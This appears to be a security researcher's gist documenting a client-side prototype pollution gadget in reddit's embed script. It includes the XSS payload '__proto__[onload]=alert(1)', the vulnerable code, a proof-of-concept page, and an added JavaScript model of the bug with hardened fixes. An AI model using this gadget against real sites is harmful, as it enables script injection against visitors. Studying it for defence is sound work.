@keerok
Last active October 17, 2021 14:51
client-side prototype pollution gadget using cross-origin embedded reddit posts
  • the payload to trigger the XSS is __proto__[onload]=alert(1)

vulnerable code (file: http://embed.redditmedia.com/widgets/platform.js):

n.prototype.init = function(a, b, c, d) {
    // b: the embed element, c: the options object for this embed, d: completion callback
    if (this.elem = b,
    this.options = c,
    !c.url)
        return this.error = !0,
        this.frame = null,
        !1;
    this.error = !1,
    this.frame = m.build(b, c, a),   // the options object c flows into the frame builder
    this._done = d;
    var g = new i
      , h = g.callback();
    this.frame.one("card.load", function(a, b) {
        h({
            iframe: a,
            doc: b
        })
    }),
    this._extract = g.callback(),
    this.extract = e.bind(function(a) {
        return this.extracted ? !1 : (this.extracted = !0,
        void this._extract(a))
    }, this),
    c.embed && (this.media = g.callback());
    var j = b.parentNode;
    j && j.offsetWidth && (j.offsetWidth > 600 ? this.frame.elem.style.width = "600px" : this.frame.elem.style.width = j.offsetWidth + "px");
    // wrapper elements are built from plain attribute maps
    var k = f.create("div", {
        "class": "embedly-card"
    })
      , l = f.create("div", {
        "class": "embedly-card-hug"
    });
    k.appendChild(l),
    l.appendChild(this.frame.elem),
    j.insertBefore(k, b),
    this.frame.__appended(),
    g.wait(this.done, this)
}

proof of concept page (deparam parses the query string, then the reddit embed script runs):

<html>
<head>
<script src="https://rawcdn.githack.com/AceMetrix/jquery-deparam/81428b3939c4cbe488202b5fa823ad661d64fb49/jquery-deparam.js"></script>
</head>
<body>
<script>
var query = deparam(location.search.slice(1));
</script>
<blockquote class="reddit-card" data-card-created="1603396221">
<a href="https://www.reddit.com/r/Slackers/comments/c5bfmb/xss_challenge/">XSS Challenge</a>
from <a href="http://www.reddit.com/r/Slackers">r/Slackers</a>
</blockquote>
<script async src="//embed.redditmedia.com/widgets/platform.js" charset="UTF-8"></script>
<script src="https://rawcdn.githack.com/AceMetrix/jquery-deparam/81428b3939c4cbe488202b5fa823ad661d64fb49/jquery-deparam.js"></script>
</body>
</html>
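The source/sink pair behind this gadget, as an added example in plain JavaScript (not code from the gist, jquery-deparam or platform.js): a deparam-style bracket parser that walks through `__proto__` onto Object.prototype, and a for..in attribute copier standing in for an element builder. The builder is a constructed stand-in, since the page does not show how f.create or m.build assign attributes; the hardened variants show the two fixes (a null-prototype result plus key filtering on the parser side, an own-property check on the sink side).

```javascript
// Added example, not the gist's or reddit's code. Models the two halves of the bug:
// a deparam-style query parser (source) and a for..in attribute copier (sink).

// "a[b][c]" -> ["a", "b", "c"]; plain keys pass through unchanged
function parseKeys(raw) {
  const m = raw.match(/^([^[]+)((?:\[[^\]]*\])*)$/);
  if (!m) return [raw];
  const keys = [m[1]];
  for (const seg of m[2].matchAll(/\[([^\]]*)\]/g)) keys.push(seg[1]);
  return keys;
}

function setPath(target, keys, value) {
  let obj = target;
  for (let i = 0; i < keys.length - 1; i++) {
    // walking through "__proto__" on a normal object lands on Object.prototype
    if (typeof obj[keys[i]] !== "object" || obj[keys[i]] === null) obj[keys[i]] = {};
    obj = obj[keys[i]];
  }
  obj[keys[keys.length - 1]] = value;
}

const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// safe=false reproduces the vulnerable behaviour; safe=true is the hardened parser:
// a null-prototype result object plus rejection of prototype-reaching path segments
function deparamLike(qs, safe) {
  const out = safe ? Object.create(null) : {};
  for (const part of qs.split("&")) {
    if (!part) continue;
    const [k, v = ""] = part.split("=");
    const keys = parseKeys(decodeURIComponent(k));
    if (safe && keys.some((key) => UNSAFE_KEYS.has(key))) continue;
    setPath(out, keys, decodeURIComponent(v));
  }
  return out;
}

// Constructed stand-in for an element builder: for..in also enumerates inherited keys,
// so a polluted Object.prototype.onload is copied as if it were an attribute.
function buildAttrs(attrMap, safe) {
  const el = {};
  for (const name in attrMap) {
    if (safe && !Object.prototype.hasOwnProperty.call(attrMap, name)) continue;
    el[name] = attrMap[name];
  }
  return el;
}

// Returns whatever "onload" value reaches the element for a given query string
function demo(qs, safe) {
  deparamLike(qs, safe);
  const leaked = buildAttrs({ class: "embedly-card" }, safe).onload;
  delete Object.prototype.onload; // undo any pollution so the rest of the process is unaffected
  return leaked;
}
```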